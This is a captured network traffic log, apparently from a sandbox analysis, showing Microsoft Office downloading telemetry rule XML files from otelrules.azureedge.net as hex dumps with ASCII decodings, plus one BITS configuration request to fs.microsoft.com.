2024-11-25 10:33:45 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:45 GMT Content-Type: text/xml Content-Length: 411 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989AF051" x-ms-request-id: 096488c1-001e-0046-44af-3eda4b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103345Z-15b8b599d882hxlwhC1TEBfa5w00000005ng00000000d0v0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:45 UTC	411	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
74	192.168.2.5	49786	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:44 UTC	192	OUT	GET /rules/rule120664v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:45 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:45 GMT Content-Type: text/xml Content-Length: 502 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6A0D312" x-ms-request-id: c229ce53-501e-008f-23c3-3b9054000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103345Z-15b8b599d88wn9hhhC1TEBry0g00000005wg000000006rb6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:45 UTC	502	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
75	192.168.2.5	49789	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:46 UTC	192	OUT	GET /rules/rule120665v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:47 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:47 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D30478D" x-ms-request-id: d599eecb-401e-0083-1bb7-3e075c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103347Z-15b8b599d882l6clhC1TEBxd5c00000005rg000000006nxh x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:47 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
76	192.168.2.5	49790	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:46 UTC	192	OUT	GET /rules/rule120666v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:47 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:47 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3F48DAE" x-ms-request-id: 877e641f-101e-007a-18c6-3e047e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103347Z-178bfbc474b7cbwqhC1NYC8z4n00000007800000000068rz x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:47 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.2.5	49791	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:47 UTC	192	OUT	GET /rules/rule120667v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:47 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:47 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BB9B6040B" x-ms-request-id: 606a4207-501e-005b-157e-3bd7f7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103347Z-174c587ffdfcj798hC1TEB9bq400000005yg00000000b182 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:47 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
78	192.168.2.5	49793	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:47 UTC	192	OUT	GET /rules/rule120668v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:47 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:47 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3CAEBB8" x-ms-request-id: edaf41ae-201e-0051-5e49-3c7340000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103347Z-174c587ffdf8lw6dhC1TEBkgs800000005wg000000002grw x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:47 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
79	192.168.2.5	49794	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:47 UTC	192	OUT	GET /rules/rule120669v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:47 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:47 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB5284CCE" x-ms-request-id: 07e1bf82-901e-0029-4cbf-3e274a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103347Z-178bfbc474btrnf9hC1NYCb80g00000007f0000000007e5w x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:47 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.5	49804	23.218.208.109	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:49 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-11-25 10:33:49 UTC	478	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Server: Kestrel ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-eus-z1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-OSID: 2 X-CID: 2 X-CCC: GB Cache-Control: public, max-age=82782 Date: Mon, 25 Nov 2024 10:33:49 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port
81	192.168.2.5	49800	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:49 UTC	192	OUT	GET /rules/rule120670v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:49 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:49 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91EAD002" x-ms-request-id: 171aa64f-101e-005a-5b63-3b882b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103349Z-178bfbc474bpnd5vhC1NYC4vr400000007a0000000006whb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:49 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
82	192.168.2.5	49801	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:49 UTC	192	OUT	GET /rules/rule120671v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:49 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:49 GMT Content-Type: text/xml Content-Length: 432 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT ETag: "0x8DC582BAABA2A10" x-ms-request-id: b3049c5e-001e-0082-330c-3d5880000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103349Z-178bfbc474bh5zbqhC1NYCkdug000000075000000000cvsd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:49 UTC	432	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T

Session ID	Source IP	Source Port	Destination IP	Destination Port
83	192.168.2.5	49805	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:49 UTC	192	OUT	GET /rules/rule120673v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:49 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:49 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT ETag: "0x8DC582BB464F255" x-ms-request-id: 1aa92f99-f01e-003c-0dea-3e8cf0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103349Z-15b8b599d88wn9hhhC1TEBry0g00000005x00000000058y4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:49 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
84	192.168.2.5	49806	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:49 UTC	192	OUT	GET /rules/rule120674v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:49 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:49 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA4037B0D" x-ms-request-id: 2727b5de-901e-005b-4cc1-3e2005000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103349Z-178bfbc474b7cbwqhC1NYC8z4n000000074000000000dpsn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:49 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
85	192.168.2.5	49803	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:49 UTC	192	OUT	GET /rules/rule120672v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:49 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:49 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA740822" x-ms-request-id: 925146da-101e-0034-3f87-3b96ff000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103349Z-174c587ffdfn4nhwhC1TEB2nbc00000005y0000000004y2t x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
